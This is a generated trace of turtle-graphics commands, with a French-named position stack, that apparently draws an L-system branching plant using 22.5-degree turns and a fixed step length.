listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((165.61,217.57), 67.5), ((183.05,259.66), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((183.05,259.66)), setheading(45.0) ;
pu(), setposition((165.61,217.57)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((176.93,228.88), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((176.93,228.88)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((176.93,228.88), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((176.93,228.88)), setheading(45.0) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((188.24,240.19), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((188.24,240.19)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((188.24,240.19), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((188.24,240.19)), setheading(45.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((188.24,240.19), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((188.24,240.19), 22.5), ((204.24,240.19), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((204.24,240.19)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((188.24,240.19), 22.5), ((204.24,240.19), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((204.24,240.19)), setheading(0.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((188.24,240.19), 22.5), ((219.02,246.32), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((219.02,246.32)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((188.24,240.19), 22.5), ((219.02,246.32), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((219.02,246.32)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((188.24,240.19), 22.5), ((230.34,257.63), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((230.34,257.63)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((188.24,240.19), 22.5), ((230.34,257.63), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((230.34,257.63)), setheading(45.0) ;
pu(), setposition((188.24,240.19)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((188.24,240.19), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((188.24,240.19), 45.0), ((194.36,254.98), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((194.36,254.98)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((188.24,240.19), 45.0), ((194.36,254.98), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((194.36,254.98)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((188.24,240.19), 45.0), ((205.68,266.29), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((205.68,266.29)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((188.24,240.19), 45.0), ((205.68,266.29), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((205.68,266.29)), setheading(45.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((188.24,240.19), 45.0), ((220.46,272.41), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((220.46,272.41)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((188.24,240.19), 45.0), ((220.46,272.41), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((220.46,272.41)), setheading(22.5) ;
pu(), setposition((188.24,240.19)), setheading(45.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((203.02,246.32), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((203.02,246.32)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((203.02,246.32), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((203.02,246.32)), setheading(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((217.80,252.44), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((217.80,252.44)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((217.80,252.44), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((217.80,252.44)), setheading(22.5) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((217.80,252.44), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((217.80,252.44), 0.0), ((232.59,246.32), 315.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((232.59,246.32)), setheading(315.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((217.80,252.44), 0.0), ((232.59,246.32), 337.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((232.59,246.32)), setheading(337.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((217.80,252.44), 0.0), ((248.59,246.32), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((248.59,246.32)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((217.80,252.44), 0.0), ((248.59,246.32), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((248.59,246.32)), setheading(0.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((217.80,252.44), 0.0), ((263.37,252.44), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((263.37,252.44)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((217.80,252.44), 0.0), ((263.37,252.44), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((263.37,252.44)), setheading(22.5) ;
pu(), setposition((217.80,252.44)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((217.80,252.44), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((217.80,252.44), 22.5), ((229.12,263.75), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((229.12,263.75)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((217.80,252.44), 22.5), ((229.12,263.75), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((229.12,263.75)), setheading(45.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((217.80,252.44), 22.5), ((243.90,269.88), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((243.90,269.88)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((217.80,252.44), 22.5), ((243.90,269.88), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((243.90,269.88)), setheading(22.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((217.80,252.44), 22.5), ((259.90,269.88), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((259.90,269.88)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((217.80,252.44), 22.5), ((259.90,269.88), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((259.90,269.88)), setheading(0.0) ;
pu(), setposition((217.80,252.44)), setheading(22.5) ;
pu(), setposition((153.37,188.00)), setheading(45.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((159.49,202.79), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((159.49,202.79)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((159.49,202.79), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((159.49,202.79)), setheading(67.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((165.61,217.57), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((165.61,217.57)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((165.61,217.57), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((165.61,217.57)), setheading(67.5) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((165.61,217.57), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((165.61,217.57), 45.0), ((180.39,223.69), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((180.39,223.69)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((165.61,217.57), 45.0), ((180.39,223.69), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((180.39,223.69)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((165.61,217.57), 45.0), ((191.71,235.00), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((191.71,235.00)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((165.61,217.57), 45.0), ((191.71,235.00), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((191.71,235.00)), setheading(45.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((165.61,217.57), 45.0), ((197.83,249.79), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((197.83,249.79)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((165.61,217.57), 45.0), ((197.83,249.79), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((197.83,249.79)), setheading(67.5) ;
pu(), setposition((165.61,217.57)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((165.61,217.57), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((165.61,217.57), 67.5), ((165.61,233.57), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((165.61,233.57)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((165.61,217.57), 67.5), ((165.61,233.57), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((165.61,233.57)), setheading(90.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((165.61,217.57), 67.5), ((171.74,248.35), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((171.74,248.35)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((165.61,217.57), 67.5), ((171.74,248.35), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((171.74,248.35)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((165.61,217.57), 67.5), ((183.05,259.66), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((183.05,259.66)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((165.61,217.57), 67.5), ((183.05,259.66), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((183.05,259.66)), setheading(45.0) ;
pu(), setposition((165.61,217.57)), setheading(67.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((171.74,232.35), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((171.74,232.35)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((171.74,232.35), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((171.74,232.35)), setheading(67.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((177.86,247.13)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((177.86,247.13)), setheading(67.5) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((192.64,253.25), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((192.64,253.25)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((192.64,253.25), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((192.64,253.25)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((203.95,264.57), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((203.95,264.57)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((203.95,264.57), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((203.95,264.57)), setheading(45.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((210.08,279.35), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((210.08,279.35)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((210.08,279.35), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((210.08,279.35)), setheading(67.5) ;
pu(), setposition((177.86,247.13)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((177.86,263.13), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((177.86,263.13)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((177.86,263.13), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((177.86,263.13)), setheading(90.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((183.98,277.91), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((183.98,277.91)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((183.98,277.91), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((183.98,277.91)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((195.29,289.23), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((195.29,289.23)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((195.29,289.23), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((195.29,289.23)), setheading(45.0) ;
pu(), setposition((177.86,247.13)), setheading(67.5) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((192.64,253.25), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((192.64,253.25)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((192.64,253.25), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((192.64,253.25)), setheading(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((207.42,259.38), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((207.42,259.38)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((207.42,259.38), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((207.42,259.38)), setheading(22.5) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((207.42,259.38), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((207.42,259.38), 0.0), ((222.20,253.25), 315.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((222.20,253.25)), setheading(315.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((207.42,259.38), 0.0), ((222.20,253.25), 337.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((222.20,253.25)), setheading(337.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((207.42,259.38), 0.0), ((238.20,253.25), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((238.20,253.25)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((207.42,259.38), 0.0), ((238.20,253.25), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((238.20,253.25)), setheading(0.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((207.42,259.38), 0.0), ((252.99,259.38), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((252.99,259.38)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((207.42,259.38), 0.0), ((252.99,259.38), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((252.99,259.38)), setheading(22.5) ;
pu(), setposition((207.42,259.38)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((207.42,259.38), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((207.42,259.38), 22.5), ((218.74,270.69), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((218.74,270.69)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((207.42,259.38), 22.5), ((218.74,270.69), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((218.74,270.69)), setheading(45.0) ;
right(22.5) ;
pd(), fd(8.0) ;
